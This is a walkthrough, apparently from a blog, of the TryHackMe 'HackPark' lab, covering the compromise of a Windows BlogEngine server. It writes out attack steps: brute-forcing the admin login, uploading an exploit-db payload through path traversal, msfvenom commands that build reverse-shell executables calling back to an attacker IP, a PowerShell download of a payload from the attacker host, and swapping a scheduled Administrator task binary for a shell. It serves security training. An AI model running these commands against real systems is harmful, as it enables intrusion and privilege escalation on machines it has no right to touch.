Skip to content

THM – HackPark: Hacking Windows with Hydra, RCE & WinPEAS

Navigate to the Application and explore the features. You will notice a Login page.

We need to identify a possible username for brute-forcing the credentials. When we look at the blog post, we can see an author named “admin” or “administrator”.

Using Burp Intruder, we can brute-force the password using Seclist’s common credentials:


We found the password: 1qaz2wsx

When we login, we can identify the version of blogengine.

Search for exploits in exploit-db. Choose the verified exploit:

Save the file as PostView.acsx

Once the file is uploaded, we can see the file in File manager.

Start a nc listener in the attacker machine: nc -lvnp 4444

Navigate to <Target Machine>/?theme=../../App_Data/files

Once you gain initial access to the server, we will pivot from netcat to a more stable shell.

Generate a reverse shell exe;

msfvenom -p windows/shell_reverse_tcp LHOST=[Attacker IP] LPORT=3333 -f exe -o shell-x86.exe

Download the shell and Winpeas to C:\Windows\Temp\ (this is world writable).

We can run winPEAS.bat and we can see the uncommon service “Windows Scheduler” running.

cd to C:\PROGRA~2\SYSTEM~1

Examine the files in the directory to see if there are any useful information.

In the Events folder, we can see that Message.exe is being executed by Administrator periodically.

Replace the Message.exe with another reverse shell payload. Rename the existing Message.exe to old_message.exe

In Attacker machine, generate the reverse shell:

msfvenom -p windows/shell_reverse_tcp LHOST=[ATTACKER IP] LPORT=5555 -f exe -o Message.exe

Download the Message.exe (reverse shell) to the folder:

powershell -c wget "http://[ATTACKER IP]/Message.exe" -outfile "Message.exe"

cd C:\Users\Administrator\Desktop and we can see the root.txt flag.

Published inTryHackMeWalkthrough

Be First to Comment

Leave a Reply

Your email address will not be published.